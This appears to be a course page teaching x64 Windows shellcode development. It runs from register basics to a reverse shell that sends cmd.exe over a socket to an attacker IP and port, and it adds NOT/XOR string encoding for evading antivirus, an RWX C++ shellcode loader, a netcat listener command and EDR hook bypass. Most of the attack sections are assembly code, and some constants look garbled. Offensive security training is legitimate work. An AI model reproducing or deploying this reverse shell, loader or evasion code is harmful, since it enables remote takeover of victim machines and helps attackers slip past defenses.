g3tsyst3m // course material

x64 Assembly &
Shellcoding 101

A ground-up practitioner's course in x64 NASM assembly — from registers and stack mechanics to position-independent shellcode and a fully functional reverse shell

x64 Windows NASM Syntax Intermediate Shellcode Development NULL-Free Techniques
01
Module One

x64 Essentials — Registers, Stack Alignment & Shadow Space

// The boring vital stuff that makes everything else work

Learning Objectives

  • Understand the x64 register set — volatile vs. non-volatile and why it matters for shellcode
  • Implement correct 16-byte stack alignment before every function call
  • Allocate and manage shadow space correctly in NASM
  • Pass 1–4+ parameters using the Windows x64 calling convention
  • Set up a working NASM build environment on Windows

Registers — Volatile vs. Non-Volatile

The x64 register set is the foundation of everything in this course. Before writing a single line of shellcode, you need to know which registers you can trust across function calls and which ones will be clobbered. Get this wrong and your shellcode will fail in subtle, maddening ways.

The Windows x64 ABI divides registers into two categories. Volatile registersRAX, RCX, RDX, R8, R9, R10, R11 — are considered scratch registers that any function call is free to destroy. If you store a value in RCX before a call, don't expect it to be there afterward. Non-volatile registersRBX, RBP, RDI, RSI, R12R15, RSP — are preserved across calls by the callee. For shellcode, we rely heavily on R12R15 to store API handles and base addresses we need to keep throughout execution.

RegisterTypeRole in ShellcodeSub-registers (64→8-bit)
RAXVolatileReturn value from function calls; scratchRAX → EAX → AX → AL/AH
RCXVolatile1st function parameterRCX → ECX → CX → CL
RDXVolatile2nd function parameterRDX → EDX → DX → DL
R8Volatile3rd function parameterR8 → R8D → R8W → R8B
R9Volatile4th function parameterR9 → R9D → R9W → R9B
R10/R11VolatileScratch; sometimes used for 5th/6th paramsR10/R11D/W/B
RBXNon-VolatileLoop counters, base pointersRBX → EBX → BX → BL
R12Non-VolatileStore DLL base addresses (kernel32, user32)R12 → R12D → R12W → R12B
R13Non-VolatileStore resolved API addressesR13 → R13D → R13W → R13B
R14Non-VolatileStore resolved API addressesR14 → R14D → R14W → R14B
R15Non-VolatileStore resolved API addressesR15 → R15D → R15W → R15B
RSPNon-VolatileStack pointer — must be 16-byte aligned before callsRSP only
RIPSpecialInstruction pointer — used in PIC code for addressingRIP only

16-Byte Stack Alignment

This is one of the most important — and most confusing — aspects of x64 assembly for newcomers. The Windows x64 ABI requires that RSP be divisible by 16 (aligned to a 16-byte boundary) immediately before any call instruction. If you violate this, your code will likely jump to an unintended memory location and crash.

The simplest mental model: the last hex digit of RSP must be 0 before a call. Instructions that modify RSP by 8 bytes each — push and pop — flip it between aligned and unaligned. Track your pushes and pops carefully.

Quick check: If RSP ends in 8 (e.g., 0x...ff8) you're misaligned by 8. A single push rax or sub rsp, 8 will re-align it. If it ends in 0 you're good to call.
NASM x64 stack_align_example.asm — demonstrating alignment mechanics
; Stack alignment demonstration ; Entry point — RSP is typically misaligned here by 8 (CALL pushed return addr) ; Fix it immediately at the top of your code: sub rsp, 0x28 ; 0x20 shadow space + 0x8 to fix alignment = 0x28 and rsp, 0xFFFFFFFFFFFFFFF0 ; nuclear option: force-align RSP (use at entry if unsure) ; Before a call with 4 or fewer args — allocate shadow space: sub rsp, 0x30 ; 0x20 shadow + 0x10 to maintain 16-byte alignment call r15 ; call our stored API address add rsp, 0x30 ; restore RSP after the call ; WinExec example — 2 parameters (RCX, RDX) pop r15 ; WinExec address previously pushed onto stack xor rax, rax ; zero RAX (we'll use this for NULL terminator trick later) push rax ; push NULL — RSP now misaligned (odd push count) mov rax, 0x6578652E636C6163 ; "calc.exe" in little-endian hex push rax ; push string — RSP now aligned again (even push count) mov rcx, rsp ; RCX (1st param) = pointer to "calc.exe" string mov rdx, 1 ; RDX (2nd param) = SW_SHOWNORMAL sub rsp, 0x30 ; shadow space allocation — keeps alignment call r15 ; WinExec("calc.exe", 1) add rsp, 0x30 ; restore shadow space

Shadow Space

Shadow space (also called the "home space" or "spill area") is 32 bytes (4 × 8-byte slots) that the caller must allocate on the stack before every call. Even if a function takes zero arguments, you must allocate sub rsp, 0x20 worth of shadow space. The callee uses this space to spill its register parameters to memory if needed — but that's the callee's business. Your job as the caller is just to make sure it's there.

In practice, you'll almost always see sub rsp, 0x28 or sub rsp, 0x30 before a call — the extra 8 or 16 bytes are to maintain 16-byte alignment on top of the 32-byte shadow requirement.

Calling Convention — Passing Parameters

Windows x64 uses a register-based calling convention for the first four arguments. Arguments 5 and beyond go directly onto the stack above the shadow space, at RSP+0x28, RSP+0x30, etc. This is one of the trickiest parts of the reverse shell module where STARTUPINFOA requires many fields.


02
Module Two

PE Structure & Walking the Export Table

// Finding WinExec without importing anything

Learning Objectives

  • Navigate the PEB to locate kernel32.dll base address without any imports
  • Walk the PE export directory to resolve function addresses by name hash
  • Understand the AddressOfNames → Ordinals → AddressOfFunctions lookup chain
  • Use Pepper PE Viewer to manually verify offsets before coding them
  • Write the foundational IAT-walking stub that every shellcode in this course builds on

Why Walk the PE Table?

Position-independent shellcode can't import functions the normal way — there's no Import Address Table (IAT) at a fixed address. Instead, we locate what we need at runtime by walking the Process Environment Block (PEB) to find loaded modules, then parsing the PE export table of each module to resolve function addresses by name. This technique is used in virtually every non-trivial shellcode payload in the wild.

The chain: GS:[0x60]PEBPEB_LDR_DATAInMemoryOrderModuleList → kernel32 base → PE headers → Export Directory → AddressOfNames / AddressOfFunctions

PEB Walk — Locating kernel32.dll

The PEB (Process Environment Block) is accessible at GS:[0x60] in x64. It contains a pointer to PEB_LDR_DATA at offset 0x18, which contains the InMemoryOrderModuleList at offset 0x20. This doubly-linked list contains every loaded module. The third entry is reliably kernel32.dll in standard Windows processes.

NASM x64 peb_walk.asm — locate kernel32.dll base address via PEB
; peb_walk.asm — g3tsyst3m Module 2 ; Locate kernel32.dll base address via the PEB InMemoryOrderModuleList ; Result: kernel32 base address in R8 (non-volatile, preserved across calls) sub rsp, 0x28 ; stack alignment + shadow space prologue and rsp, 0xFFFFFFFFFFFFFFF0 ; force-align RSP ; ── Step 1: Get PEB address from GS segment register ── mov rax, [gs:0x60] ; RAX = PEB base address ; ── Step 2: Get PEB_LDR_DATA ── mov rax, [rax+0x18] ; RAX = PEB->Ldr (PEB_LDR_DATA*) ; ── Step 3: InMemoryOrderModuleList.Flink (first entry = ntdll) ── mov rax, [rax+0x20] ; RAX = first LIST_ENTRY (ntdll) mov rax, [rax] ; RAX = second entry (this process's image or ntdll variant) mov rax, [rax] ; RAX = third entry = kernel32! ; ── Step 4: Extract DllBase (base address) ── ; LIST_ENTRY is InMemoryOrder, DllBase is at offset +0x20 from InMemoryOrder link mov r8, [rax+0x20] ; R8 = kernel32.dll base address — store in non-volatile! mov rbx, r8 ; RBX = kernel32 base (working copy for PE parsing) ; ── Step 5: Navigate to PE header ── mov ebx, [rbx+0x3C] ; EBX = RVA of PE signature (e_lfanew field) add rbx, r8 ; RBX = VMA of PE header (kernel32 base + RVA)

Export Directory Walk — Resolving WinExec

With the PE header address in hand, we navigate to the Export Directory and walk three parallel arrays: AddressOfNames (function name strings), AddressOfNameOrdinals (index mapping names to functions), and AddressOfFunctions (actual RVAs). The lookup: search AddressOfNames for our target string → get the ordinal index → use that to index into AddressOfFunctions → add kernel32 base to get the VMA.

NASM x64 export_walk.asm — walk PE export table to resolve WinExec
; export_walk.asm — g3tsyst3m Module 2 ; Continues from peb_walk.asm — RBX = PE header VMA, R8 = kernel32 base ; Goal: resolve WinExec address into R15 ; ── Navigate to Export Directory ── ; Export Directory RVA is at PE_header+0x88 (IMAGE_OPTIONAL_HEADER64 DataDirectory[0]) xor rcx, rcx ; clear RCX — used as counter add cx, 0x88ff ; add 0x88ff to lower 16 bits (NULL-free trick for 0x88) shr rcx, 0x8 ; shift right — RCX = 0x88 (our export dir offset) mov edx, [rbx+rcx] ; EDX = Export Directory RVA add rdx, r8 ; RDX = Export Directory VMA ; ── Get AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals ── mov r10d, [rdx+0x14] ; R10D = NumberOfFunctions xor r11, r11 ; R11 = 0 (index counter) mov r12d, [rdx+0x20] ; R12D = AddressOfNames RVA add r12, r8 ; R12 = AddressOfNames VMA ; ── Load target function name "WinExec" onto stack for comparison ── mov rcx, rdx ; preserve Export Dir pointer in RCX mov rax, 0xa8969191ba9a9c6f ; "WinExec" encoded (NOT-encoded, Module 4 style) not rax ; decode: now RAX = "WinExec" in little-endian bytes shl rax, 0x8 ; shift to align string bytes (remove extra byte) shr rax, 0x8 ; right shift — null-terminates without a null in shellcode push rax ; push "WinExec\0" to stack mov rax, rsp ; RAX = pointer to "WinExec" string add rsp, 0x8 ; clean up stack (our string is in RAX ptr) ; ── Name search loop ── findname: jecxz done ; if ECX counter = 0, we've exhausted names (not found) xor rbx, rbx mov ebx, [r12+r11*4] ; EBX = AddressOfNames[i] RVA add rbx, r8 ; RBX = function name string VMA dec rcx ; decrement counter mov r13, [rbx] ; R13 = first 8 bytes of function name cmp r13, [rax] ; compare with our target "WinExec" je found inc r11 ; increment name index jmp findname found: ; ── Get ordinal → function address ── xor r13, r13 mov r13d, [rcx+0x24] ; R13D = AddressOfNameOrdinals RVA add r13, r8 ; R13 = AddressOfNameOrdinals VMA mov r13w, [r13+r11*2] ; R13W = ordinal for our function xor r14, r14 mov r14d, [rcx+0x1C] ; R14D = AddressOfFunctions RVA add r14, r8 ; R14 = AddressOfFunctions VMA mov eax, [r14+r13*4] ; EAX = WinExec function RVA add rax, r8 ; RAX = WinExec VMA (final resolved address!) mov r15, rax ; R15 = WinExec address (non-volatile storage) done:

03
Module Three

NULL Byte Elimination

// Making shellcode actually usable in the real world

Learning Objectives

  • Identify every source of null bytes in x64 assembly output using objdump
  • Apply shift-based null termination to push strings without null bytes in shellcode
  • Use XOR + ADD tricks for loading memory offsets that would otherwise produce nulls
  • Verify null-free output and extract clean shellcode bytes

Why NULL Bytes Break Shellcode

Many classic shellcode delivery mechanisms — stack-based buffer overflows, format string exploits, and string-copy loaders — treat 0x00 as a string terminator. If your shellcode contains a null byte, the delivery mechanism stops copying at that point and your payload is truncated. NULL-free shellcode is not optional for real-world use — it's a requirement.

The good news: every instruction that produces a null byte has a null-free equivalent, just less obvious. The core techniques are shift-based string null-termination, XOR/ADD for zero values, and careful register sizing.

NASM x64 null_removal.asm — key techniques for eliminating null bytes
; null_removal.asm — g3tsyst3m Module 3 ; Core techniques for NULL-free shellcode ; ── Technique 1: XOR to zero a register (no null bytes) ── ; BAD: mov rax, 0 → produces \x48\xb8\x00\x00\x00\x00\x00\x00\x00\x00 (8 nulls!) ; GOOD: xor rax, rax → produces \x48\x31\xc0 (3 bytes, zero nulls) xor rax, rax ; zero RAX — the canonical null-free zeroing idiom xor rcx, rcx ; same for RCX (first parameter) ; ── Technique 2: Shift-based string null termination ── ; Goal: push "WinExec\0" without embedding a 0x00 byte in our shellcode ; "WinExec" = 7 bytes. We load 8 bytes where byte[0] = 0x90 (placeholder) mov rax, 0x90636578456E6957 ; 0x90 + "WinExec" — 0x90 is our non-null placeholder shl rax, 0x8 ; shift left 8 bits → 0x636578456E695700 (0x90 gone, null at MSB) shr rax, 0x8 ; shift right 8 bits → 0x00636578456E6957 (null byte in MSB position) push rax ; stack now has "WinExec\0" — the null is IN MEMORY, not in shellcode! ; ── Technique 3: ADD/SHR trick for NULL-free memory offsets ── ; Problem: mov edx, [rbx+0x88] → "0x88" itself is fine but the MOD/RM encoding ; of certain combinations produces null bytes. Use register indirection instead: xor rcx, rcx ; zero RCX add cx, 0x88ff ; add 0x88ff to CX (16-bit) — no null bytes in this encoding shr rcx, 0x8 ; shift right 8 → RCX = 0x88 (the value we wanted) mov edx, [rbx+rcx] ; now use RCX as the offset — no null in encoding! ; ── Technique 4: Use JECXZ instead of loop with potential null branch ── ; jecxz (jump if ECX is zero) is 2 bytes, no nulls, perfect for loop control jecxz done ; jump to done if ECX = 0 (exhausted function names) ; ── Verification: use objdump to check for nulls ── ; objdump -d -M intel shellcode.o | grep " 00 " ; Any line with " 00 " in the hex column is a null byte — fix it!

04
Module Four

String Encoding with Bitwise Operations

// Defeating static analysis without an encoder framework

Learning Objectives

  • Encode string literals using the NOT instruction to defeat static AV string scanning
  • Use the Windows Calculator to pre-compute NOT values without writing a script
  • Apply XOR encoding as an alternative to NOT for string obfuscation
  • Understand the limits of single-instruction encoding vs. full encryption

Why Encode Strings in Shellcode?

Static analysis tools — antivirus, YARA rules, EDR file scanning — look for recognizable strings like WinExec, calc.exe, cmd.exe, and Windows API names in binary files. If your shellcode contains these as plaintext, a simple string scan will flag it before it ever executes. The NOT instruction gives us a one-instruction encode/decode that adds zero overhead and eliminates plaintext strings entirely.

NASM x64 not_encoding.asm — NOT-based string encoding for static analysis evasion
; not_encoding.asm — g3tsyst3m Module 4 ; Encode strings using NOT instruction — defeats simple string scanning ; Pre-computation: take your target string's hex value and NOT it in the Calculator ; Store the NOT'd value in shellcode → at runtime, NOT it back to the original ; ── Encoding "WinExec" with NOT ── ; Original "WinExec" as immediate: 0x636578456E6957 (7 bytes, MSB-first) ; Apply NOT: ~0x90636578456E6957 = 0x6F9C9A87BA9196A8 ; This is what we store — static scanners see 0x6F9C9A87BA9196A8, not "WinExec" mov rax, 0x6F9C9A87BA9196A8 ; NOT'd "WinExec" (stored in shellcode) not rax ; decode at runtime → RAX = 0x90636578456E6957 shl rax, 0x8 ; shift placeholder out, null into MSB shr rax, 0x8 ; RAX = "WinExec\0" — ready to push push rax ; ── Encoding "calc.exe" with NOT ── ; Original: 0x6578652E636C6163 → NOT'd: 0x9A879AD19C939E9C mov rax, 0x9A879AD19C939E9C ; NOT'd "calc.exe" not rax ; decode → RAX = "calc.exe" push rax ; push decoded string (already 8 bytes, no shl/shr needed) mov rcx, rsp ; RCX = pointer to "calc.exe" ; ── Using Windows Calculator to pre-compute NOT values ── ; 1. Open Calculator → Programmer mode ; 2. Enter your string hex value ; 3. Click NOT → result is your encoded value to embed in shellcode ; 4. To verify: NOT(NOT(x)) = x — double-NOT should give you back the original ; ── XOR encoding as an alternative ── ; Choose any non-null key (e.g., 0xAA) mov rax, 0xCBDFD884CC0600C9 ; "WinExec" XOR'd with 0xAAAAAAAAAAAAAA xor rax, 0xAAAAAAAAAAAAAAAA ; XOR back with same key → original string ; XOR key must not create null bytes! Choose your key carefully.

05
Module Five

Dynamic API Resolution with GetProcAddress

// Popping a MessageBox the hard way — and why it matters

Learning Objectives

  • Use GetProcAddress and LoadLibraryA to load user32.dll and resolve MessageBoxA
  • Manage the 4-parameter calling convention for MessageBoxA in x64 assembly
  • Locate ExitProcess to cleanly terminate shellcode without crashing
  • Build a reusable API resolution stub for use in more complex shellcode

Beyond kernel32 — Loading Additional DLLs

Our PE-walking technique from Module 2 locates functions in kernel32.dll. But shellcode often needs APIs from other DLLs — user32.dll for UI functions, ws2_32.dll for sockets, ntdll.dll for native APIs. The solution: use GetProcAddress and LoadLibraryA (both in kernel32) to dynamically load any DLL and resolve any function at runtime. This is the API resolution pattern used in the reverse shell in Modules 6 and 7.

NASM x64 getprocaddress.asm — dynamic API resolution and MessageBoxA pop
; getprocaddress.asm — g3tsyst3m Module 5 ; Resolve GetProcAddress via PE walk, then use it to load user32.dll and MessageBoxA ; Prerequisite: R8 = kernel32 base, PE walk completed from Module 2 ; ── Locate GetProcAddress ── (using same PE walk, searching for "GetProcAddress") ; Result stored in R14 (non-volatile) ; ── Locate LoadLibraryA ── ; Result stored in R15 (non-volatile) ; ── Locate ExitProcess ── mov r13, r12 ; temp copy of kernel32 handle (GetProcAddress will need it) mov rcx, rdi ; RCX = kernel32 module handle (1st param) ; Push "ExitProcess" string NULL-free: mov rax, 0x90737365 ; "ess" + 0x90 placeholder, 4-byte value shl eax, 0x8 ; 0x73736500 — null terminated in 32-bit shr eax, 0x8 ; 0x00737365 — "ess\0" push rax ; push "ess\0" mov rax, 0x636F725074697845 ; "ExitProc" (little-endian) push rax ; push "ExitProc" mov rdx, rsp ; RDX = pointer to "ExitProcess" string sub rsp, 0x30 call r14 ; GetProcAddress(kernel32, "ExitProcess") add rsp, 0x30 mov r14, rax ; R14 = ExitProcess address ; ── Load user32.dll ── xor rax, rax mov al, 0x6C ; "l" character shl eax, 0x10 ; make room: 0x006C0000 shr eax, 0x10 ; 0x0000006C — "l\0" (null terminated!) push rax mov rax, 0x642E323372657375 ; "user32.d" little-endian push rax mov rcx, rsp ; RCX = "user32.dll" sub rsp, 0x30 call r15 ; LoadLibraryA("user32.dll") add rsp, 0x30 mov rdi, rax ; RDI = user32.dll base address ; ── Resolve MessageBoxA from user32.dll ── mov rcx, rdi ; RCX = user32.dll handle mov rax, 0x41797261 ; "Aary" → last 4 bytes of "MessageBoxA" push rax mov rax, 0x426F636573736147 ; "GasseBoG" wait... "MessageBo" in LE push rax mov rdx, rsp ; RDX = "MessageBoxA" sub rsp, 0x30 call r13 ; GetProcAddress(user32, "MessageBoxA") — stored earlier add rsp, 0x30 mov r15, rax ; R15 = MessageBoxA address ; ── Call MessageBoxA(NULL, "g3tsyst3m", "g3tsyst3m", MB_OK) ── xor rcx, rcx ; RCX = NULL (no owner window) mov rax, 0x006D ; "m\0" — final char of "g3tsyst3m" push rax mov rax, 0x3374737973743367 ; "g3tsyst3" in little-endian push rax mov rdx, rsp ; RDX = lpText = "g3tsyst3m" mov r8, rsp ; R8 = lpCaption = same string xor r9d, r9d ; R9 = uType = MB_OK (0) sub rsp, 0x30 call r15 ; MessageBoxA — pops the g3tsyst3m box! add rsp, 0x30

06
Module Six

Reverse Shell — Using Extern APIs

// Building your first reverse shell the easy way before doing it the hard way

Learning Objectives

  • Understand the Winsock API chain required for a TCP reverse shell
  • Use EXTERN declarations to link against ws2_32.lib and kernel32.lib
  • Populate the STARTUPINFOA structure correctly in x64 assembly
  • Redirect stdin/stdout/stderr to a socket handle for shell I/O
  • Compile and link a functional reverse shell executable with MinGW-w64

The Extern Approach — Learning Before the Deep End

A full dynamic reverse shell (Module 7) requires resolving 6+ socket APIs manually via PE walking — that's 500+ lines of assembly and a significant complexity jump. Module 6 uses EXTERN declarations to link against the APIs directly, producing a clean, readable reverse shell that demonstrates the logic without the noise. Think of it as a scaffold: understand the control flow here, then Module 7 removes the training wheels.

NASM x64 asmsock_extern.asm — reverse shell using EXTERN API declarations
; asmsock_extern.asm — g3tsyst3m Module 6 ; Reverse shell via extern APIs — compile+link: ; nasm -f win64 asmsock_extern.asm -o asmsock.obj ; ld -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib asmsock.obj -o asmsock.exe -lws2_32 -lkernel32 BITS 64 section .text global main ; ── Extern declarations — linker resolves these from ws2_32/kernel32 ── extern WSAStartup extern WSASocketA extern WSAConnect extern CreateProcessA extern ExitProcess main: sub rsp, 0x28 and rsp, 0xFFFFFFFFFFFFFFF0 ; ── WSAStartup(0x0202, &wsaData) ── sub rsp, 0x200 ; allocate space for WSADATA structure (408 bytes) mov rcx, 0x0202 ; wVersionRequired = 2.2 mov rdx, rsp ; &wsaData sub rsp, 0x30 call WSAStartup add rsp, 0x30 ; ── WSASocketA(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6, NULL, 0, 0) ── xor rcx, rcx mov cl, 2 ; AF_INET xor rdx, rdx mov dl, 1 ; SOCK_STREAM xor r8, r8 mov r8b, 6 ; IPPROTO_TCP xor r9, r9 ; lpProtocolInfo = NULL ; 5th param (0) and 6th param (0) go on stack above shadow space: xor rax, rax push rax ; dwFlags = 0 (6th param) push rax ; g = 0 (5th param) sub rsp, 0x20 ; shadow space call WSASocketA ; returns socket handle in RAX add rsp, 0x30 ; restore (shadow + 2 stack params) mov rdi, rax ; RDI = socket handle (preserve in non-volatile) ; ── Build SOCKADDR_IN structure on stack ── ; struct { WORD family; WORD port; DWORD addr; BYTE zero[8]; } xor rax, rax push rax ; padding zeros (8 bytes) push rax ; sin_addr = 0.0.0.0 (replaced: use your attacker IP) ; IP 192.168.1.100 in network byte order (big-endian): 0xC0A80164 mov eax, 0x6401A8C0 ; 192.168.1.100 in little-endian (flip for network order) push rax ; Port 4444 = 0x115C → network byte order = 0x5C11 mov ax, 0x5C11 ; htons(4444) xor rcx, rcx mov cx, 2 ; AF_INET shl rcx, 16 or rcx, rax ; combine family + port into one QWORD push push rcx mov rdx, rsp ; RDX = &SOCKADDR_IN ; ── WSAConnect(socket, &sockaddr, sizeof(sockaddr), NULL, NULL, NULL, NULL) ── mov rcx, rdi ; socket handle xor r8, r8 mov r8b, 16 ; sizeof(SOCKADDR_IN) xor r9, r9 ; lpCallerData = NULL ; remaining NULLs on stack for params 5-7: xor rax, rax push rax push rax push rax sub rsp, 0x20 call WSAConnect add rsp, 0x38 ; ── Populate STARTUPINFOA ── (the most painful part of the reverse shell) ; Fields: cb(DWORD), reserved(PTR), desktop(PTR), title(PTR), ; dwX/Y/XSize/YSize(DWORDs), wShowWindow(WORD), cbReserved2(WORD), ; lpReserved2(PTR), hStdInput/Output/Error(HANDLE) — redirected to socket! ; We push fields in reverse order (stack grows down) xor rax, rax ; hStdError, hStdOutput, hStdInput — all set to socket handle push rdi ; hStdError = socket push rdi ; hStdOutput = socket push rdi ; hStdInput = socket push rax ; lpReserved2 = NULL ; wShowWindow=1 and cbReserved2=0 packed into DWORD, dwFlags=0x100 (STARTF_USESTDHANDLES) push 0x0001010000000000 ; wShowWindow|cbReserved2 + dwFlags=STARTF_USESTDHANDLES push rax ; dwYCountChars/dwXCountChars push rax ; dwYSize/dwXSize push rax ; dwY/dwX push rax ; lpTitle push rax ; lpDesktop push rax ; lpReserved mov eax, 0x68 ; cb = sizeof(STARTUPINFOA) = 104 (0x68) push rax mov rax, rsp ; RAX = &STARTUPINFOA ; ── CreateProcessA(NULL, "cmd.exe", ..., &STARTUPINFOA, &PROCESS_INFORMATION) ── xor rcx, rcx ; lpApplicationName = NULL ; push "cmd.exe" string and set RDX... sub rsp, 0x30 call CreateProcessA add rsp, 0x30 ; ── ExitProcess(0) ── xor rcx, rcx sub rsp, 0x30 call ExitProcess
Replace 0x6401A8C0 (192.168.1.100) and 0x5C11 (port 4444) with your actual attacker IP and port in network byte order before testing. Verify your listener is running: nc -lvnp 4444

07
Module Seven

Pure x64 Assembly Reverse Shell

// No externs. No training wheels. 500+ lines of pure assembly.

Learning Objectives

  • Dynamically resolve all Winsock APIs (WSAStartup, WSASocketA, WSAConnect) via PE walking
  • Load ws2_32.dll at runtime using LoadLibraryA resolved from kernel32
  • Build a complete NULL-free reverse shell in pure position-independent x64 assembly
  • Understand why this is the "final exam" of x64 shellcode development

The Final Exam

This module is the culmination of everything in the course. No externs, no shortcuts — every API is resolved at runtime using the techniques from Modules 2–5. All strings are NULL-free using the techniques from Modules 3–4. The result is position-independent shellcode that can be extracted as raw bytes and executed in any context.

The code is long — 500+ lines — but if you've worked through the previous modules it's not magic. It's the same patterns repeated: PEB walk, PE export walk, string push, API call. The only new complexity is ws2_32.dll (which must be loaded via LoadLibraryA since it's not pre-loaded in most processes) and the full STARTUPINFOA structure population without any extern help.

The complete source for this module is available as a downloadable NASM file in the course materials. The code walkthrough below highlights the key structural sections. Full inline comments explain every instruction.
NASM x64 revshell_pure.asm — structural overview of pure dynamic reverse shell
; revshell_pure.asm — g3tsyst3m Module 7 ; Pure x64 assembly reverse shell — no externs, fully dynamic API resolution ; Full source: see course download. This shows the top-level structure. ; ; === SECTION 1: Prologue + PEB Walk → kernel32 base === BITS 64 section .text global main main: sub rsp, 0x28 and rsp, 0xFFFFFFFFFFFFFFF0 ; PEB → InMemoryOrderModuleList → kernel32 base → R8 mov rax, [gs:0x60] mov rax, [rax+0x18] mov rax, [rax+0x20] mov rax, [rax] mov rax, [rax] mov r8, [rax+0x20] ; R8 = kernel32 base ; === SECTION 2: Resolve GetProcAddress + LoadLibraryA from kernel32 === ; (full PE export table walk — same as Module 2, targeting "GetProcAddress" and "LoadLibraryA") ; Result: R13 = GetProcAddress, R15 = LoadLibraryA ; === SECTION 3: Load ws2_32.dll === ; Push "ws2_32.dll" NULL-free, call LoadLibraryA xor rax, rax mov al, 0x6C shl eax, 0x10 shr eax, 0x10 ; "l\0" push rax mov rax, 0x6C642E32335F3273 ; "s2_32.dl" push rax mov rcx, rsp sub rsp, 0x30 call r15 ; LoadLibraryA("ws2_32.dll") add rsp, 0x30 mov rdi, rax ; RDI = ws2_32.dll base ; === SECTION 4: Resolve WSAStartup, WSASocketA, WSAConnect from ws2_32 === ; For each: push NULL-free encoded name, call GetProcAddress(rdi, name) ; Store results in non-volatile registers / push to stack for later ; === SECTION 5: Resolve CreateProcessA + ExitProcess from kernel32 === ; === SECTION 6: WSAStartup → WSASocketA → WSAConnect === ; Identical logic to Module 6 but calling dynamically resolved addresses ; === SECTION 7: STARTUPINFOA population + CreateProcessA === ; Identical structure to Module 6 — hStdInput/Output/Error = socket ; === SECTION 8: ExitProcess(0) === xor rcx, rcx sub rsp, 0x30 call r14 ; ExitProcess(0)

08
Module Eight

Shellcode Execution & C++ Loaders

// Getting your shellcode off the disk and into memory

Learning Objectives

  • Build a C++ shellcode loader using VirtualAlloc + memcpy + function pointer
  • Understand PAGE_EXECUTE_READWRITE vs. safer VirtualProtect patterns
  • Embed shellcode as a C array and as a file-read from disk
  • Understand why the loader itself is the primary detection surface for modern EDR

The Standard Shellcode Loader

A shellcode loader's job is simple: get the shellcode bytes into executable memory and transfer control to them. The standard approach — VirtualAlloc with PAGE_EXECUTE_READWRITE, memcpy, then cast and call — is functional but heavily signatured by modern EDR. This module teaches the baseline that everything else builds on.

C++ loader.cpp — standard shellcode execution harness
// loader.cpp — g3tsyst3m Module 8 // Standard shellcode execution harness // Build: cl.exe loader.cpp /link /out:loader.exe #include <windows.h> #include <iostream> // Paste your extracted shellcode bytes here: unsigned char shellcode[] = "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9" "\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b" /* ... full shellcode bytes ... */; int main() { // Allocate RWX memory void* exec_mem = VirtualAlloc( nullptr, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); if (!exec_mem) { std::cerr << "[-] VirtualAlloc failed: " << GetLastError() << "\n"; return 1; } std::cout << "[+] Allocated " << sizeof(shellcode) << " bytes at 0x" << exec_mem << "\n"; // Copy shellcode into executable region memcpy(exec_mem, shellcode, sizeof(shellcode)); // Cast to function pointer and execute auto sc_func = (void(*)())exec_mem; std::cout << "[+] Executing shellcode...\n"; sc_func(); // Should not reach here if shellcode calls ExitProcess VirtualFree(exec_mem, 0, MEM_RELEASE); return 0; }
Course Complete. You've gone from registers and stack alignment to a fully dynamic NULL-free reverse shell in pure x64 assembly. The code templates and full source files are in your course download. Now go break things — legally. 🐱

09
Module Nine

Python Shellcode Generator — TEB Walk, Extraction & NOT+XOR Encoding

// From .asm to encoded deploy-ready bytes — entirely on Windows, no VM needed

Learning Objectives

  • Write a TEB-based kernel32 locator that defeats EDR hooks on the standard PEB walk path
  • Use Python on Windows to extract raw shellcode bytes from a compiled .obj — no Linux VM required
  • Apply Bitwise NOT + XOR encoding in a single Python script to produce static-analysis-resistant shellcode
  • Understand how embedding the key inside the encoded payload enables self-decoding without hardcoding its position
  • Use the assembly junk-instruction inserter to produce different bytes on every compilation run

Why a New Kernel32 Walk? — Defeating EDR Hooks

The standard PEB walk from Module 2 traverses InMemoryOrderModuleList and trusts list position to find kernel32 — the third entry. This works on clean systems, but some EDR products (notably Avast) hook the initial loader modules. Walking by position can return the hooked version rather than the real kernel32 base.

The solution: instead of trusting position, search the module list for a module whose Unicode name starts with KERN. Unless the EDR names their hook KERNxx.dll, you skip right past the hook and land on real KERNEL32.DLL. This approach also starts from the TEB rather than directly from GS:[0x60] — a subtle but meaningful structural difference that adds resilience against intercepted fast paths.

Walk chain: GS:[0x30] → TEB base → [TEB+0x60] → PEB → [PEB+0x18] → PEB_LDR_DATA → [Ldr+0x10] → InMemoryOrderModuleList → iterate checking Unicode name bytes for KERN.

NASM x64 calc.asm — TEB-based kernel32 finder + WinExec("calc.exe")
; calc.asm — g3tsyst3m Module 9 ; Compile: nasm -fwin64 calc.asm -o calc.obj ; Link: ld -m i386pep -o calc.exe calc.obj ; ; Key difference from Module 2 PEB walk: ; - Starts from TEB (GS:[0x30]) not PEB (GS:[0x60]) directly ; - Searches for Unicode "KERN" rather than trusting list position ; - Bypasses EDR hooks that intercept the standard 3rd-entry shortcut BITS 64 SECTION .text global main main: sub rsp, 0x28 and rsp, 0xFFFFFFFFFFFFFFF0 xor rcx, rcx ; ── TEB → PEB ────────────────────────────────────────────────────── mov rax, [gs:0x30] ; RAX = TEB base (GS:[0x30] always points to TEB) mov rax, [rax+0x60] ; RAX = PEB base (TEB.PebBaseAddress at +0x60) ; ── PEB → LDR → InMemoryOrderModuleList ──────────────────────────── mov rax, [rax+0x18] ; RAX = PEB.Ldr (PEB_LDR_DATA*) mov rsi, [rax+0x10] ; RSI = Ldr.InMemoryOrderModuleList.Flink ; ── Walk list searching for Unicode "KERN" ────────────────────────── checkit: mov rsi, [rsi] mov rcx, [rsi+0x60] ; RCX = pointer to module name Unicode buffer mov rbx, [rcx] ; RBX = first 8 bytes of Unicode name mov rdx, 0x004E00520045004B ; "K E R N" in UTF-16LE: K=004B E=0045 R=0052 N=004E cmp rbx, rdx jz foundit jnz checkit foundit: mov rbx, [rsi+0x30] ; RBX = DllBase (kernel32 base address) mov r8, rbx ; R8 = kernel32 base (non-volatile) ; ── Parse Export Address Table ────────────────────────────────────── mov ebx, [rbx+0x3C] add rbx, r8 xor rcx, rcx add cx, 0x88ff ; NULL-free way to build 0x88 shr rcx, 0x8 ; RCX = 0x88 mov edx, [rbx+rcx] ; EDX = Export Directory RVA add rdx, r8 ; RDX = Export Directory VMA mov r10d,[rdx+0x14] xor r11, r11 mov r11d,[rdx+0x20] add r11, r8 mov rcx, r10 ; ── 